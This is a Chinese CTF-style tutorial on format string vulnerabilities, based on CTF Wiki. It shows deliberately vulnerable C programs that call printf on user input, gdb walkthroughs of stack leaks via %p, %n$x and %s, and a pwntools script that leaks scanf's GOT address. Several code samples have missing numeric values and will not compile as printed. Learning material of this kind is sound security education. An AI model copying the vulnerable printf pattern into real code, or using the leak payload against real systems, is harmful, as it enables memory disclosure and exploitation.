格式化字符串漏洞 format string exploit（一）

本文系原创，转载请说明出处

本文为基于CTF WIKI的PWN学习

0x00 格式化字符串原理

先附一张经典的图，如下

其栈上布局如下：

some value　

3.14

123456

addr of "red"

addr of format string : " Color %s, Number %d, Float %4.2f"

如果程序写成了：

printf("Color %s, Number %d, Float %4.2f");

分别将栈上的三个变量分别解析为：

1. 解析其地址对应的字符串
2. 解析其内容对应的整形值
3. 解析其内容对应的浮点值

我们编写程序验证以下：

#include <stdio.h>
int main() {

  printf("Color %s, Number %d, Float %4.2f", “red”, , 3.14);
  printf("Color %s, Number %d, Float %4.2f");
  return ;
}

输入以下命令编译（记得安装libc6-dev-i386库）：

 gcc -m32 -fno-stack-protector -no-pie -o leakmemory 1.c 

运行结果

gdb调试一下：

b printf后输入r运行

可以看到在第一个printf的运行中，stack的参数正如上文所说，先是格式化字符串，再是123456（的16进制），最后是3.14

继续调试至第二个printf（一直按n）

stack中我们发现，首先入栈的依旧是格式化字符串，但是上面三个参数不再是之前的那几个了。按照原理，第二次输出的应该是0xffffcfb4及之后的两个内存对应的内容。下面我们来细致讨论。

0x01 漏洞利用

利用格式化字符串漏洞，我们还可以获取我们所想要输出的内容。一般会有如下几种操作

• 泄露栈内存
  • 获取某个变量的值 （%s）
  • 获取某个变量对应地址的内存 （%p）
• 泄露任意地址内存
  • 利用 GOT 表得到 libc 函数地址，进而获取 libc，进而获取其它 libc 函数地址 (addr%n$s)
  • 盲打，dump 整个程序，获取有用信息。

 一、泄露内存

（1）获取栈变量数值

这里使用ctf wiki上面的例子：

#include <stdio.h>
int main() {
  char s[];
  int a = , b = 0x22222222, c = -;
  scanf("%s", s);
  printf("%08x.%08x.%08x.%s\n", a, b, c, s);
  printf(s);
  return ;
}

编译运行调试

调试：

直接转载（copy）了：可以看出，此时此时已经进入了 printf 函数中，栈中第一个变量为返回地址，第二个变量为格式化字符串的地址，第三个变量为 a 的值，第四个变量为 b 的值，第五个变量为 c 的值，第六个变量为我们输入的格式化字符串对应的地址。继续运行程序，按c

将会把上图中0xffffcf44及其后面两个地址包含的内容输出输出：

并不是每次得到的结果都一样 ，栈上的数据会因为每次分配的内存页不同而有所不同，这是因为栈是不对内存页做初始化的。这可以从我上面的几个截图结果看出来。

（2）获取栈指定变量值

可以使用%n$x获得栈上第n+1个参数，格式化字符串是第一个参数，那么如果想获得printf的第n个参数，就需要加1.

如，我想获得第三个参数值f7e946bb，那么我就输入%3$x

（3）获取对应字符串：%s

（4）获取数据:%p

 

二、获取任意地址内存

上面的泄露并不强力，比赛中经常需要泄露某一个 libc 函数的 got 表内容，从而得到其地址，进而获取 libc 版本以及其他函数的地址，这时候，能够完全控制泄露某个指定地址的内存就显得很重要了。

这里我们再看一遍源程序代码：

#include <stdio.h>
int main() {
  char s[];
  int a = , b = 0x22222222, c = -;
  scanf("%s", s);
  printf("%08x.%08x.%08x.%s\n", a, b, c, s);
  printf(s);
  return ;
}

scanf接收入s的值，然后两个printf。这里我们输入%s，如下调试，打印出0xff007325, 就是%s对应的字符串值，所以，输出函数的栈分布，栈上的第一个参数就是格式化字符串的地址。

这就意味着格式化字符串内容可控，同时，还需要注意的是，第一个参数虽然放置的是格式化字符串的地址，但是，输出函数并没有在这里开始调用，你也可以从上图中看到，在0xffffcf50处，又有一个%s，这里才是调用格式化字符串的时候，输出格式化字符串表达的内容时刻。这就意味着，因为格式化字符串我们可以自己控制，那么，如果我格式化字符串里面包含了%s，它会输出%s对应地址（0xff007325）所包含的内容，如果包含scanf@got, 它会输出scanf@got对应地址包含的内容，也就是scanf的真实地址。

总结：1、格式化字符串可以按照自己的意愿输入。2、格式化字符串的地址为栈上的第一个参数，顺序之后的某个位置会调用这个格式化字符串，以格式化字符串的内容输出内容。

所以，我们只要知道，调用这个格式化字符串的位置就可以了。

根据CTF WIKI上的说明方案，我们可以使用下面的字符来确定格式化字符串在哪调用：

[tag]%p%p%p%p%p%p...

如果输出栈的内容与我们前面的 tag 重复了，那么我们就可以有很大把握说明该地址就是格式化字符串的地址，之所以说是有很大把握，这是因为不排除栈上有一些临时变量也是该数值（0x41414141）。如：

AAAA  0XFFD2RC30  0XC2  0XF7E596BB  0X41414141   0X702570250

我们调试看一下：

我输入的是AAAA加上8个%p

你会看到，AAAA后面依次输出8个内容，

第一个输出AAAA，这本来就是字符，作为一个标志显示出来罢了。然后往后，%p开始作用，依次是0xffffcfa0（可以看到格式化字符串为第一个参数，%p从格式字符串下一个开始），0xc2, 0xf7e946bb这些都是跟着格式化字符串后面的参数，之后，便打印出来0xffffcfa0地址对应的内容，即字符串。也就是说，其相对printf函数，为第5个参数（第五行），但是相对格式化字符串（第一行），是第四个参数。那么既然是第四个参数，我们使用%4$s看看测试一下。

然后你会发现core dump：

为啥？调试。

首先，%4$s对应的存放地址为0xffffcfa0, 我们查看内存发现存着的是0x73243425, 再看看0x73243425放着什么，啥都没有，那肯定崩溃。

我们输入%4$s是0x73243425, 我们输入%5$s是0x732434525,................

那就是说，我们确定了参数为第几个后，在tag处输入想要获得的内容的地址，那么，输出的将是输入的地址对应的内容。

然后使用CTF wiki上payload改改就可以实现获取scanf的地址：

from pwn import *
sh = process('./leakmemory')
leakmemory = ELF('./leakmemory')
__isoc99_scanf_got = leakmemory.got['__isoc99_scanf']  #获取got地址
print hex(__isoc99_scanf_got)
payload = p32(__isoc99_scanf_got) + '%4$s'  #想要输出的地址加上确定好的参数位置
print payload
sh.sendline(payload)
sh.recvuntil('%4$s\n')
print hex(u32(sh.recv()[4:8])) # 去掉 __isoc99_scanf@got的地址
sh.interactive()